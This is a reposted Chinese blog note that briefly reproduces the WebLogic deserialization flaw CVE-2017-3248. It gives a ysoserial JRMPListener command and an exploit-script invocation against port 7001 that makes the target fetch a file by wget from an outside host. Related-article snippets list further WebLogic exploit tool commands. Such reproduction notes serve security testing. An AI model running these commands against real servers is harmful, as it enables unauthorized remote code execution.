CVE-2017-3248简单复现

最新推荐文章于 2024-12-25 01:15:27 发布

转载最新推荐文章于 2024-12-25 01:15:27 发布 · 977 阅读

1 ·

CC 4.0 BY-SA版权

原文链接：http://www.cnblogs.com/mrhonest/p/11533997.html

文章标签：

#python

本文介绍了如何通过特定的命令序列，在Windows主机上使用Java和在Linux虚拟机上使用Python来实现CVE-2017-3248漏洞的利用，展示了从设置环境到执行命令的全过程。

我是这样操作的
目标跟windows在一个段,linux是另一个段的,我的虚拟机

windows主机上

`java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections5 "wget http://11.205.242.98/32.txt"

linux虚拟机上执行

python exploit-CVE-2017-3248-bobsecq.py -t 目标IP -p 7001 --jip 11.205.242.98 --jport 1099 --cmd "wget http://11.205.242.98/32.txt" --ysopath ysoserial.jar

简单证明即可

转载于:https://www.cnblogs.com/mrhonest/p/11533997.html

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

ddr12231

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

[ vulhub漏洞复现篇 ] Apache Log4j Server 反序列化命令执行漏洞 CVE-2017-5645

qq_51577576的博客

09-14

2605

[ vulhub漏洞复现篇 ] Apache Log4j Server 反序列化命令执行漏洞 CVE-2017-5645 Apache Log4j是一个用于Java的日志记录库，其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。

[ vulhub漏洞复现篇 ] solr 远程命令执行 (CVE-2017-12629-RCE)

qq_51577576的博客

12-07

866

[ vulhub漏洞复现篇 ] solr 远程命令执行 (CVE-2017-12629-RCE) Apache Solr 是Apache开发的一个开源的基于Lucene的全文搜索服务器。其集合的配置方法（config路径）可以增加和修改监听器，通过RunExecutableListener执行任意系统命令。

参与评论您还未登录，请先登录后发表或查看评论

WebLogic反序列化_CVE-2017-3248

09-06

WebLogic反序列化_CVE-2017-3248 java -jar weblogic_cmd.jar -C pwd -H 192.168.1.1 -P 7001 工具使用方法： -B Runtime Blind Execute Command maybe you should select os type -C (执行命令)Execute Command[need set] -dst path to dst file -H （执行主机）Remote Host[need set] -https enable https or tls -noExecPath custom execute path -os （操作系统类型）Os Type [windows,linux] -P （远程端口）Remote Port[need set] -shell enable shell module -src path to src file -T Payload Type[marshall, collection, streamMessageImpl] -U Uninstall rmi -upload enable upload a file

weblogicT3反序列化之CVE-2017-3248&CVE-2018-2628&CVE-2018-3245

weixin_45682070的博客

03-13

6125

前言上上篇文章我们分析了CVE-2015-4852、CVE-2016-0638、CVE-2016-3510的漏洞，因果是从resolveClass方法中出现的，resolveClass方法直接继承了父类的方法，然后没有任何过滤的造成了序列化漏洞，后面两个cve都是前者的绕过。今天分析一下CVE-2017-3248 & CVE-2018-2628，上上文中我们知道readClassDesc类描述方法可分为没有代理的类和代理类，CVE-2017-3248漏洞的成因就是代理类resolveProxyCl

WebLogic_CVE-2017-3248&&GetShell-CMD验证工具.rar

02-11

Weblogic任意命令执行的检测工具。 WebLogic_CVE-2017-3248文件夹的执行命令： java -jar weblogic_cmd.jar -C whoami -H 10.1.1.104 -P 8083 Weblogic Unserialization GetShll&CMD文件夹的执行命令： java -jar Weblogic-Unserialization-GetShll-CMD.jar 或者双击starter.bat.

CVE-2017-3248&CVE-2018-2628

一个安全研究员

05-27

2883

如题

web反序列化漏洞原理_CVE-2017-3248——WebLogic反序列化初探_零开始网络安全技巧

程序员六七的博客

07-16

912

安全客 - 安全资讯平台

浅谈Node.js CVE-2017-14849 漏洞分析（详细步骤）

10-19

【Node.js CVE-2017-14849 漏洞分析】 Node.js 是一个基于 Chrome V8 引擎的 JavaScript 运行时，它提供了高效的事件驱动、非阻塞 I/O 模型，使得开发高性能的网络应用变得简单。Express，则是建立在 Node.js 平台...

vulhub靶场搭建与使用与CVE-2017-6920漏洞复现

weixin_66746863的博客

12-25

1057

反序列化漏洞复现 vulhub靶场搭建

[ vulhub漏洞复现篇 ] Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞(CVE-2017-6920)

qq_51577576的博客

02-17

1009

[ vulhub漏洞复现篇 ] Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞(CVE-2017-6920） Drupal是使用PHP语言编写的开源内容管理框架，它由内容管理系统（CMS）和PHP开发框架（Framework）共同构成，在GPL2.0及更新协议下发布。连续多年荣获全球最佳CMS大奖，是基于PHP语言最著名的WEB应用程序。CVE-2017- 6920 是Drupal Core的YAML解析器处理不当所导致的一个远程代码执行漏洞，影响8.x的Drupal Core。

CVE-2017-10271 Weblogic反序列化漏洞补丁（FMJJ）

01-09

Weblogic反序列化漏洞补丁（FMJJ），这是一个累积补丁，代号FMJJ

CVE-2017-3248——WebLogic反序列化漏洞利用工具

weixin_30628801的博客

07-20

974

著名的web中间件WebLogic被曝出之前的反序列化安全漏洞补丁存在绕过安全风险，用户更新补丁后，仍然存在被绕过成功执行远程命令攻击的情况，安全风险高，Oracle官方及时发布了最新补丁，修复了该漏洞，阿里云安全团队建议用户尽快自查并升级。具体详情如下: 漏洞编号: CVE-2017-3248 漏洞名称: WebLogic 反序列化漏洞官方评级: 高危漏洞描述: Or...

WebLogic反序列化漏洞（CVE-2017-3248）

公众号shadow sock7

11-19

7856

参考： https://paper.seebug.org/333/ 环境安装反弹shell参考： https://w00troot.blogspot.com/2017/05/getting-reverse-shell-from-web-shell.html weblogic在服务器命令行安装步骤参考： https://blog.youkuaiyun.com/caiqiiqi/article/details/...

weblogic之CVE-2017-3248，CVE-2018-2628,CVE-2018-2893，CVE-2018-3245反序列绕过分析

weixin_30820151的博客

01-11

933

说一下复现CVE-2017-3248可以参考p牛的环境，p牛的环境CVE-2018-2628实际就是CVE-2017-3248，他漏洞编号这块写错了。攻击流程就如下图，攻击者开启JRMPListener监听在1099端口，等待受害者链接，当受害者链接时，把gadgets返回给客户端： CVE-2017-3248以后的漏洞都是利用了JRMP java远程方法协议，利用java.rmi...

gitblog_00075的博客

06-15

530

weblogic系列漏洞整理————6、反序列化漏洞（CVE-2017-3248）

Fly_鹏程万里

11-01

3610

0x01 漏洞描述 2017年1月27日，WebLogic 官方发布了一个编号为 CVEID: CVE-2017-3248 的漏洞，影响为 Critical 。之前轰动一时的反序列化漏洞，官方当时的修补措施，在本漏洞中可被绕过。此次漏洞影响 WebLogic 版本如下图所示： 0x02 漏洞分析与验证分析之前 WebLogic 漏洞 CVE-2015-4852 的补丁，发现 WebLo...

weblogic漏洞分析之CVE-2017-3248 & CVE-2018-2628

洋洋的小黑屋

08-23

217

CVE-2017-3248 & CVE-2018-2628 后面的漏洞就是2017-3248的绕过而已，所以poc都一样，只是使用的payload不同本机开启JRMP服务端 -》利用T3协议发送payload使得weblogic反序列化后，开启JRMP客户端，并连接服务端 -》服务端发送exp给客户端，客户端上的DGC接收到响应即会反序列化。详细的细节看我的另一篇文章：ysoseri...

漏洞复现（CVE-2017-10271）